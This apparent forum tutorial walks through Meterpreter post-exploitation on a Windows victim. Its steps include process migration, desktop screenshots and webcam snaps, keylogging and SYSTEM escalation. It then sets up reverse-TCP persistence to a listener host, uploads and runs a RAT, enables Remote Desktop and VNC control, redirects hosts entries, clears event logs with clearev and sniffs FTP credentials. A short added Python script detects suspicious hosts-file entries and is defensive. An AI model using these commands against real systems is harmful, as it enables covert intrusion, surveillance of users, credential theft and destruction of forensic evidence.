Meterpreter is a well-known payload that is injected via reflective DLL injection. It is very powerful and has a lot of commands, which we will be looking at. Using a Meterpreter session, you can even pivot through remote networks and exploit systems inside them as if you had direct access to them.
Code:
ps
This lists the active processes and their PIDs.
If we injected the payload through the browser, we need to move away from it: if the browser gets closed, we lose our session with it. How do we do that? We migrate to another process. Let's migrate to explorer.exe.
(Note: this is not Internet Explorer.)
Find the PID of explorer.exe and then type:
Code:
migrate (pid)
For example:
Code:
migrate 568
Now that we are safe, we might as well start exploring other features. We can take a screenshot of the victim's desktop and a snapshot from the webcam by using:
Code:
screenshot (for a screenshot of the desktop)
webcam_snap (for a snapshot from the webcam)
Next, you can view files and change directories directly from the Meterpreter session by using:
Code:
ls - similar to 'dir' in DOS
cd - change directory
del - delete a file
rmdir - remove a directory
mkdir - make a directory
NOTE: When you are browsing or doing anything with the target's drives, make sure you always write backslashes in paths as double backslashes (\\), because a single backslash is treated as an escape character.
Now let's try to get SYSTEM privileges by typing:
Code:
getsystem
This will most likely fail on Windows 7. Meterpreter tries three different techniques before giving up.
I said previously that Meterpreter has a keylogger option. Let's test it. We have to migrate to the explorer process for this to work.
Code:
keyscan_start
Now wait for a while and then type:
Code:
keyscan_dump
This dumps the keystrokes recorded so far.
Example:
Code:
keyscan_dump
"Dumping captured keystrokes...
<return> Hello There it worked!"
Now let's set up persistence, so that even when the target shuts down the PC we get the session back when it comes online again.
NOTE: You will have to start multi/handler to listen for the incoming connections.
Code:
run persistence -U -I (interval) -P (lport) -R (lhost)
-U runs the payload when the user logs on, -I is the interval in seconds between connection attempts (for example, 5 makes it try to connect every 5 seconds), -P is the local port and -R is the local host to connect back to.
Code:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost (local IP)
set lport (port used)
exploit
For example:
Code:
run persistence -U -I 5 -P 4444 -R 192.168.2.101
Now that it is backdoored, we will always have access to it. However, some of you don't like all this typing and prefer a GUI, so you can upload your RAT server.
Code:
upload C:\\RAT.exe C:\\
This uploads our server, called "RAT.exe", from our C:\ drive to the target's C:\ drive.
NOTE: If you don't have admin privileges, upload it elsewhere; a good place would be C:\users\%username%. Now let's open a command shell and run the file we uploaded.
Code:
shell
Now navigate to where you uploaded the file and run it.
Code:
cd C:\
start Hello.exe
We got a connection. Meterpreter has another nice option: we can download files from the target's PC using the download command.
Code:
download C:\\hello.exe
You can enable Remote Desktop on the target machine as well. Do this by typing:
Code:
run getgui -u username -p password -e
This enables Remote Desktop and creates a user with the desired username and password. Connect to the target from the BackTrack console by typing:
Code:
rdesktop -u Username -P password RemoteIP
This is not the best way to view the target's screen, because the logged-on user will be notified of the connection. I personally recommend using VNC instead.
Code:
run vnc
This allows you to view the desktop and control it at will.
Meterpreter also has the ability to edit the hosts file.
Code:
run hostsedit -e (IP to redirect to),(site to be redirected)
For example:
Code:
run hostsedit -e 127.0.0.1,google.com
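As an added defender's check (not part of the original tutorial), the script below parses a Windows hosts file in the plain "IP hostname" format that hostsedit writes and flags entries that pin a watched domain to any address or redirect a public name to loopback. The sample hosts file and the watched-domain list are constructed for the example.

```python
import ipaddress
import re

# Constructed sample of a hosts file after a redirect entry like the one
# "run hostsedit -e 127.0.0.1,google.com" would add. The commented-out
# localhost line mirrors the stock Windows file and must be ignored.
SAMPLE_HOSTS = """# Copyright (c) 1993-2009 Microsoft Corp.
# localhost name resolution is handled within DNS itself.
#   127.0.0.1       localhost
127.0.0.1 google.com
10.0.0.5 update.example-corp.internal   # constructed internal alias
"""

# Constructed list of domains that should only ever be resolved via DNS.
WATCHED_DOMAINS = {"google.com", "www.google.com", "login.microsoftonline.com"}


def parse_hosts(text):
    """Return a list of (ip, [hostnames]) for each active (non-comment) entry."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # strip full-line and inline comments
        if not line:
            continue
        parts = re.split(r"\s+", line)
        ip, names = parts[0], parts[1:]
        try:
            ipaddress.ip_address(ip)
        except ValueError:
            continue  # first token is not an IP address: skip the malformed line
        entries.append((ip, [n.lower() for n in names]))
    return entries


def suspicious_entries(text, watched=WATCHED_DOMAINS):
    """Return (ip, hostname) pairs that either pin a watched domain to a fixed
    address or point a non-localhost name at a loopback address."""
    findings = []
    for ip, names in parse_hosts(text):
        addr = ipaddress.ip_address(ip)
        for name in names:
            if name == "localhost":
                continue  # the stock loopback mapping is legitimate
            if name in watched or addr.is_loopback:
                findings.append((ip, name))
    return findings


if __name__ == "__main__":
    for ip, name in suspicious_entries(SAMPLE_HOSTS):
        print(f"suspicious hosts entry: {name} -> {ip}")
```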
To clear the Windows event logs after you're done, run:
Code:
clearev
Sniffing
Code:
use sniffer
sniffer_start (interface)
In my case it's:
Code:
sniffer_start 1
Now, on the victim side, let's use FileZilla to log in to an FTP site.
Wait for some time before dumping the captured packets with (1 is the interface):
Code:
sniffer_dump 1 /root/Desktop/name.cap
Now stop the sniffer with:
Code:
sniffer_stop 1
This creates the file name.cap on the Desktop, which can be opened with Wireshark. So, let's open a new console in BackTrack and type wireshark in it. This loads the GUI.
Simply open your CAP file and browse through the packets; you will see that it captured the FTP username and password, because FTP sends them in plain text.
Nice tutorial :)